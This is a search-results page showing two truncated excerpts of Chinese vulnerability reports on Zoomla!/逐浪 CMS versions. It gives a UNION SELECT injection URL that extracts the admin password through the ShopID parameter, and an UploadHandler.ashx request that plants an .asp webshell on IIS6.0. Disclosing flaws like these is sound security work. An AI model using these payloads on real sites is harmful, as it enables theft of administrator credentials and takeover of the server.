2 matches found
逐浪CMS一个文件夹9款注入姿势影响版本cms4.1 CMS2_x1.5 CMS6.0 CMS2_x1.4正式版
简要描述: 影响版本Zoomla!cms4.1源码Zoomla!CMS2x1.5源码 Zoomla!CMS6.0 Zoomla!逐浪CMS2x1.4正式版 此文件夹注入点蛮多的 厂商需努力呀 详细说明: 文件目录3D 注入1 文件/3D/1sMail.aspx 问题阐述 ShopID 测试: http://192.168.10.19:9992/3d/sMail.aspx?ShopID=1000000 union// all select// 1,2,'3','4','5','6','7','8','9',STUFFadminPassword , 1, 0,...
逐浪CMS一个漏洞的各种拿Shell姿势(系统环境限制)
简要描述: 文件目录随意保存影响版本:包含此文件的版本均受影响 拿Shell影响版本:包含此文件的版本均受影响 仅是(IIS6.0) 依官网最新版本为测试对象 Zoomla!CMS2x1.5 详细说明: 首先还是问题出现的部分 文件 None Dir则为目录参数 那么可以简单的构造成 http://192.168.10.19:9992/User/UploadHandler.ashx?content=aaaaaaaaa&Dir=.asp 上传得到SHell 地址为Domain/UploadFiles/用户名/.asp/文件名 图 另外文件可以随意保存...